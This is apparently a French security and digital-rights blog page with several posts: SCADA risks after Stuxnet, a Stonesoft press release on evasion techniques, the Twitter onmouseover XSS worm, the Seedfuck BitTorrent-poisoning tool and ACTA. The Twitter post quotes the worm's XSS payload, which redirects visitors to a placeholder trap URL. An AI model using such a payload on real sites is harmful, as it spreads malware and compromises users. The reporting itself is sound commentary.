SCADA sous les balles

SCADA
SCADA

On a encore récemment parlé de SCADA à l’occasion de la propagation du ver Stuxnet qui visait des systèmes SCADA Siemens. Sa cible et ses auteurs présumés, comme son fonctionnement, ont été largement commentés et ceci est du à la nature des équipements sur lesquels les systèmes SCADA opèrent. L’une des 4 vulnérabilités inconnue jusqu’à Stuxnet, et qui affectait Windows, a tout juste été fixée. Stuxnet par son aspect ultra élaboré est soupçonné d’être l’oeuvre d’une agence gouvernementale dans le but de mettre à mal une centrale nucléaire iranienne. Nous n’aurons probablement jamais le fin mot de l’affaire mais ceci a peut être été l’occasion pour certains d’aller jeter un oeil sur la sécurité de ces systèmes dédiés au monitoring et à l’acquisition de données d’équipements industriels ou de génie civil, divers et variés.

Daté d’hier, un exploit révèle un buffer overflow dans les systèmes SCADA Realflex de DATAC Realwin.

Ce qui se passe aujourd’hui, en dehors du mystère Stuxnet, résulte de dizaines d’années de mauvaises pratiques sécuritaires chez quelques éditeurs et dans le secteur de l’informatique industrielle. La situation est toutefois assez inquiétante et tous les pays concernés devraient méditer un audit sans concession de ces infrastructures, ne serait-ce, que pour évaluer le risque, souvent amoindri au prétexte que ces équipements sont rarement interconnectés.

Si certains systèmes ne présentent que peu de risques, des systèmes dédiés à des sites bien identifiés comme à risque (ponts, tunnels, lignes de transport ferroviaire, installations nucléaires…) devraient faire l’objet d’attentions nouvelles.

Sans céder à la paranoia, il serait bienvenu, même au niveau français et c’est pas Ossama qui me contredira, de prendre la mesure exacte des risques de scénarios noirs sur ces systèmes et essayer de comprendre si nous y sommes préparés.

DPI : Stonesoft découvre une AET (Advanced Evasion Technique ) sur les solutions d’inspection de contenus

Il va se passer aujourd’hui quelque chose de drôle… de très drôle… Je n’ai pas encore réussi à obtenir plus d’information sur la vulnérabilité dont il est fait état dans ce communiqué de presse ni son impact sur des technologies d’inspection de contenu que certains aimeraient utiliser pour faire la chasse aux contenus copyrightés, en tout cas, vu d’ici, je sens la bonne barre de rire en perspective.

Le CERT-FI devrait dans la journée nous apporter plus d’information mais en gros, STONESOFT aurait découvert une technique avancée d’évasion qui permettrait la compromission d’un grand nombre de technologies d’inspection de contenu. Pour le moment, impossible de dire si cette découverte aura un impact sur les technologies de deep packet inspection que certains souhaitent mettre à disposition de la chasse aux fichiers copyrightés. Cette information à prendre avec des pincettes, donnerait un terrible écho à ce billet ainsi qu’à celui ci si elle venait à être confirmée et si son impact sur les technologies de DPI était mis en évidence.

Voici le communiqué de la société :

Communiqué de presse

Découverte d’une nouvelle menace de sécurité : les entreprises du monde entier menacées

Des techniques d’évasion avancées capables de traverser la plupart des équipements de sécurité réseau ont été découvertes.

Levallois-Perret, le 18 octobre 2010 – Stonesoft, fournisseur innovant de solutions de sécurité réseau intégrées et de continuité de l’activité annonce aujourd’hui avoir découvert une nouvelle forme de techniques avancées d’évasion (AET = Advanced Evasion Techniques) qui menacent très sérieusement les systèmes de sécurité du monde entier. Cette découverte vient compléter et renforcer ce qui est déjà connu des techniques d’évasion dites plus classiques. L’information a été remontée au CERT et aux ICSA Labs qui ont également validé son sérieux et son fondement.

Les AET sont l’équivalent d’un passe-partout permettant aux cybercriminels d’ouvrir les portes de tout système vulnérable comme un ERP ou un CRM. Elles sont en effet capables de contourner les systèmes de sécurité réseau sans laisser aucune trace. Pour les entreprises, cela signifie qu’elles risquent de perdre des données confidentielles. Par ailleurs, on peut tout à fait imaginer que des cyber terroristes s’appuient sur ces AET afin de mener des activités illégales pouvant avoir des graves conséquences.

La découverte a eu lieu dans les laboratoires de recherche de Stonesoft basés à Helsinki. Les experts ont ensuite envoyé des échantillons et remonté l’information à l’organisme de sécurité nationale finlandais le CERT ainsi qu’aux laboratoires ICSA (division indépendante de Verizon Business) qui testent et délivrent des certifications aux solutions de sécurité et aux équipements connectés au réseau. Le CERT-FI, chargé coordonner au niveau mondial les parades aux vulnérabilités identifiées, en collaboration avec les éditeurs de sécurité réseau, a publié, le 4 octobre quelques
informations sur ces techniques avancées d’évasion et les mettront à jour, aujourd’hui même.

Les vulnérabilités identifiées par Stonesoft touchent un grand nombre de technologie d’inspection du contenu*. Pour contrer ces vulnérabilités, une collaboration permanente du CERT-FI de Stonesoft et des autres éditeurs de sécurité réseau est absolument essentielles. Le CERT-FI s’efforce de faciliter cette coopération » explique Jussi Eronen, à la tête du département Coordination sur les Vulnérabilités.

Juha Kivikoski, COO chez Stonesoft explique : « Beaucoup de facteurs nous poussent à croire que n’avons découvert que la partie émergée de l’iceberg.  La nature dynamique et indétectable de ces techniques avancées d’évasions peut potentiellement bouleverser l’ensemble du paysage de la sécurité réseau. Le marché rentre désormais dans une course sans fin contre ce nouveau type de menaces avancées et il semblerait que seules les solutions dynamiques pourront tirer leur épingle du jeu. »

« Stonesoft a découvert de nouvelles techniques de contournement des systèmes de sécurité réseau. Les laboratoires ICSA ont validé les recherches et la découverte de Stonesoft. Par ailleurs, nous pensons que ces techniques avancées d’évasion peuvent avoir des conséquences pour les entreprises touchées, comme entre autres la perte de données stratégiques et
confidentielles » déclare Jack Walsh, directeur des programmes IPS (Système de Prévention des Intrusions) chez ICSA Labs.

Les AET « dans la nature »

C’est à l’occasion du test de leurs propres solutions de sécurité réseau StoneGate face à des nouvelles attaques élaborées que les experts de Stonesoft ont découvert cette nouvelle catégorie de menaces. Les tests en conditions réelles et les données recueillies lors de l’expérience démontrent que la plupart des solutions de sécurité réseau n’ont pas su détecter ces AET et n’ont, par conséquent, pas pu les bloquer.

Stonesoft soutient l’idée que des pirates du monde entier sont peut-être déjà en train d’exploiter ces AET pour lancer des attaques élaborées et très ciblées. Seuls quelques produits sont à même de fournir une protection contre ce phénomène, les entreprises doivent donc mettre en place un moyen de défense très rapidement.

Quel est le meilleur moyen de se protéger contre une AET ?

Pour se protéger de ces techniques d’évasion dynamiques et en constante évolution, il est nécessaire de s’équiper de *systèmes logiciels de sécurité capables de se mettre à jour à distance et d’être administrés de façon centralisée.  Ces systèmes possèdent un avantage indéniable en termes de protection contre des menaces aussi dynamiques que les AET. Stonesoft fait partie des acteurs délivrant ce type de solutions, via sa gamme StoneGate.

Cependant, la grande majorité des équipements de sécurité réseau dans le monde sont des solutions matérielles, pour lesquelles il est difficile voire impossible de se mettre à jour au même rythme que ces techniques d’évasion, qui mutent en permanence.

Pour en savoir plus sur les techniques d’évasion et participer au débat sur la façon de les combattre, connectez-vous au site www.antievasion.com
Pour plus d’informations sur les solutions StoneGate de Stonesoft, rendez-vous à l’adresse suivante : www.stonesoft.com

Centre Mondial d’information 24h/24 sur ce sujet : + 358 40 823 7511

Contact presse ICSA Labs :
Brianna Carroll Boyle,
Public Relations Manager
Verizon and ICSA Labs
+1 703-859-4251
[email protected]

Le CERT-FI encourage les personnes désireuses de communiquer par email à utiliser la clé PGP. La clé est disponible est disponible à cette adresse :
https://www.cert.fi/en/activities/contact/pgp-keys.html
Les politiques du groupe de coordination sur les vulnérabilités sont disponibles à l’adresse suivante :
https://www.cert.fi/en/activities/Vulncoord/vulncoord-policy.html

A propos de Stonesoft :
Stonesoft Corporation (OMX : SFT1V) est un fournisseur innovant de solutions de sécurité réseau intégrées. Ses produits sécurisent le flux d’informations à l’échelle d’entreprises distribuées. Les clients de Stonesoft sont notamment des entreprises dont les besoins commerciaux croissants requièrent une sécurité réseau avancée et une connectivité professionnelle permanente.

La solution de connectivité sécurisée StoneGate™ fusionne les aspects de la sécurité réseau que sont le pare-feu (FW), le réseau privé virtuel (VPN), la prévention d’intrusion (IPS), la solution de réseau privé virtuel à technologie SSL (SSL VPN), la disponibilité de bout en bout, ainsi qu’un équilibrage des charges plébiscité, au sein d’une appliance dont la gestion est centralisée et unifiée. Les principaux avantages de la solution de connectivité sécurisée StoneGate se traduisent notamment par un coût total de possession faible, un excellent rapport prix/performances et un retour sur investissement élevé. La solution StoneGate virtuelle protège le réseau et assure une continuité de service aussi bien dans les environnements
réseaux virtuels que physiques.

La solution SMC (StoneGate Management Center) permet une gestion unifiée des solutions StoneGate Firewall with VPN, IPS et SSL VPN. Les solutions StoneGate Firewall et IPS fonctionnent en synergie pour fournir une défense intelligente à l’échelle du réseau de l’entreprise toute entière, tandis que la solution StoneGate SSL VPN renforce la sécurité dans le cadre d’une utilisation mobile et à distance. Fondé en 1990, Stonesoft Corporation a son siège mondial à Helsinki, en Finlande, et un autre siège social aux États-Unis, à Atlanta, en Géorgie.

Pour plus d’informations sur Stonesoft Corporation, ses produits et services, consultez le site www.stonesoft.com – le blog institutionnel :http://stoneblog.stonesoft.com


L’Iran se serait débarrassé de Stuxnet

On en causait il y a peu ici, Stuxnet, un mystérieux virus s’en prendrait à des infrastructures industrielles. Le risque est la destruction physique d’équipements industriels, pouvant impliquer des pertes en vie humaines. À ce jour, c’est la Chine qui serait la plus touchée en nombre par le virus qui y revendique plus de 6 millions de machines infectées, une information qui contraste assez avec celle en provenance d’Iran, où les autorités affirment s’être débarrassées du worm. Siemens a effectivement publié un antidote mais l’élaboration de l’attaque n’a pas fini de faire causer dans les conventions relatives à la sécurité informatique. La persistance du virus et sa propagation soutenue pour le système ciblé reste inquiétante et tout triomphalisme me semble personnellement un peu prématuré.

Le New York Times aurait de son côté trouvé un indice, une référence biblique, qui viendrait conforter un peu plus la thèse soutenue par certains, venant à pointer du doigt les services secrets israéliens et peut être même, américains… à moins qu’il ne s’agisse d’une diversion, ce qui est fort probable également, vu l’enjeu et la réalisation de ce vers qui s’appuie sur pas moins de 4 failles 0day et le vol de certificats électroniques de constructeurs. L’attaque a été préparée de manière savante et on imagine difficilement qu’elle soit l’oeuvre de personnes ne disposant pas de moyens considérables.

En trame de fond, la polémique pourrait même devenir un cas d’école pour certains équipementiers, qui, comme Siemens, dont les équipements étaient la cible initiale de Stuxnet, risquent d’avoir un peu de travail en terme de communication clients sur la sécurisation de leurs dispositifs à usages industriels. Siemens aurait par exemple recommandé à ses clients de ne pas installer d’antivirus au motif que ceci pourrait ralentir le système ou inviterait à laisser les mots de passe  de connexion à la base de données inchangés.

Je vous invite à lire l’interview de Stephan Tanase sur le MagIT pour comprendre les enjeux et les raisons de la perplexité de tous les experts qui se sont intéressés à ce dossier, ainsi que l’article tout frais de Mag-Securs qui se penche sur les auteurs supposés de l’attaque.

Twitter et le worm du onmouseover

Comme de nombreuses personnes, je me suis fait piéger en utilisant un bouton de retweet… enfin piégé, comme les contacts qui me l’ont filé et comme les contacts à qui je l’ai refilé, en fait c’est imparable, le seul moyen de l’éviter est de ne pas se rendre sur twitter.com.  Vous vous doutez bien que certains n’ont pas manqué l’occasion de me taquiner, et ils ont raison.  Leur point commun : aucun d’entre eux n’utilise l’interface web mais un client Twitter. Les clients tiers ne sont pas concernés (enfin s’ils n’executent pas de javascript douteux et non du Java comme j’ai pu le lire dans la presse). Cest bien le site web de Twitter qui est affecté et il est donc vivement recommandé de ne pas l’utiliser pour le moment, rabattez vous sur un client qui gère les script/noscript plus correctement que le site web lui même. C’est un XSS qui est actuellement exploité et que les utilisateurs se refilent gentiment. Tout ceci ne fait qu’apporter un peu plus d’eau au moulin sur une question que je m’étais posé en lisant le décret d’application HADOPI qui touche à la sécusation de sa connexion Internet :

où s’arrête la connexion Internet que je suis sensé sécuriser ?

  • Réponse A : à ma machine ?
  • Réponse B : à ma box ?
  • Réponse C : au noeud de raccordement de mon opérateur ?
  • Réponse D : au site web que je visite ?

… voici la démonstration parfaite que sécuriser une « connexion Internet » ne veut RIEN dire ! La vulnérabilité exploitée sur Twitter peut servir à compromettre des millions de données de particuliers, et donc des accès à leur LAN, ajoutez à ça que tout se retrouve en ce moment sur pastebin.. public… Sur ce point, n’en déplaise à certains experts, tout expert soient ils, plaider en faveur de la sanction des utilisateurs est une ânerie.

Je n’ai pas observé de vol de compte ou autre vol de session dans le submit de l’url générée par la connexion via le mouseover, mais une exploitation plus méchante pourrait faire beaucoup de mal. Le worm renvoi à une url piégée qui peut contaminer votre machine (je n’ai pas eu ce privilège car je ne suis pas sur Windows, je n’ai pas eu le droit à une redirection et je n’ai pas cliqué sur l’url générée), mais il serait intéressant d’aller jeter un oeil sur les malwares qui s’y trouvent.. Cependant je m’excuse auprès des follower auxquels j’ai surement transmis le tweet piégé (je l’ai aussitôt effacé de ma timeline).

La source viendrait d’un compte créé pour l’occasion @rainbowtwtr, le poc est très simple, ça nous donne un truc du type  :

http://twitter.com/pwn3d@ « onmouseover = » javascript: window.location = « http://www.urlpiegee.com ‘,’ /

… simple mais efficace. Attendez vous à des variantes aujourd’hui même qui pourraient être plus méchantes, le risque est présent tant que twitter n’aura pas corrigé la vulnérabilité exploitée sur son propre site.

Comme Google en atteste, ce worm fait mal avec plus de 18000 réponses pour le moment (Twitter étant un média social viral par excellence, c’est un terrain de choix pour la propagation de ce genre de choses).

Le conseil du moment : utilisez un client Twitter (une extension pour votre navigateur ou autre, mais ne passer pas par le site twitter.com

Seedfuck : maintenant en Java et en PHP

Il s’est passé beaucoup de choses ce weekend autour de Seedfuck, ce qui n’était qu’un petit proof of concept accessible à quelques nerds est aujourd’hui un petit logiciel utilisable par n’importe qui :

  • En Python (avec une interface web)
  • En Java (avec une interface graphique)
  • En PHP (une nouvelle variante mode web, installable sur n’importe quel hébergement grand public, renommée BTPoison.php car elle est assez différente dans son fonctionnement et moins « trash »)

Deux posts importants :

Retenons trois faits importants :

  • La collecte des preuves par la HADOPI, va couter plus cher que prévu pour une fiabilité plus que douteuse, une position encore confortée par la l’étrange consultation nationale sur le droit à l’oubli numérique qui fait rire jusqu’en Suède ;
  • Seedfuck va subir encore pas mal d’évolutions et il y a un risque de le voir inoculé via des chevaux de Troie sur des machines « zombifiées ».
  • Seedfuck a donc muté de l’état de proof of concept à l’état de menace réelle et sérieuse en 48 heure, preuve de la volonté des internautes de s’opposer à cette mauvaise réponse au faux problème que représente la HADOPI,

ACTA, je te vois et je ne t’aime pas

fair_tradeOn parle beaucoup d’HADOPI sur ce petit blog, déjà parce que nous sommes en France et qu’HADOPI est la cyber griffe de notre exception culturelle française, un petit peu aussi parce qu’elle va finir par être drôle tellement elle est ridicule… mais ça ne veut pas dire que rien ne se passe en dehors de nos frontières autour du bridage des libertés numériques. Il y a bien évidemment le Paquet Télécom que nous suivons avec attention depuis de longs mois et que l’amendement 138, ou amendement Bono (pas le chanteur, le député européen) a rendu relativement populaire.

Mais beaucoup plus discrètement, on peut même dire secrètement, l’ACTA laisse se profiler des menaces bien plus inquiétantes que ce qui se passe à Bruxelles. L’ACTA (Anti-Counterfeiting Trade Agreement), qui comme son nom l’indique est un traité international de libre échange visant à … tuer les échanges libres de produits culturels qui enfreignent les copyrights, fait l’objet d’obscures tractations entre les USA et l’Union Européenne depuis plus d’un an et le peu d’informations qui filtrent ne sont pas faites pour nous rassurer. Très peu de sources d’informations francophones vous proposent de suivre, la plus fiable étant comme bien souvent, celle fournit par le collectif de la Quadrature du Net. Au menu de l’ACTA : riposte graduée et filtrage du Net, deux thèmes qui ont fait d’HADOPI un précurseur dans la stratégie de l’échec.

Pourquoi l’ACTA fait-il donc l’objet de tant de mystère ? La première raison évoquée par la presse américaine est qu’il serait impossible d’arriver à un accord avec chaque pays tant son contenu a de quoi faire froid dans le dos. De nombreux pays quitteraient la table des négociations à l’exposé même des pistes envisagées… plus exactement, Ron Kirk, en charge pour les USA de mener les négociations aurait confessé « The reason we can’t make it public is people would walk away from the table ». L’ACTA serait même classifiée Secret Défense pour les USA, et pour cause, on y parle quand même de filtrage du Net généralisé au niveau international … L’Union Européenne elle même soupçonne l’administration Obama d’être instrumentalisée par les lobby des industries culturelles.

Si le sujet vous passionne, je ne saurais trop vous recommander de fouiller dans les entrailles de Wikileak, assurement la ressource internationale la plus prolixe et fiable sur le sujet. Au niveau calendaire, il ne faut pas s’attendre à voir quelque chose éclore avant fin 2010 ou début 2011.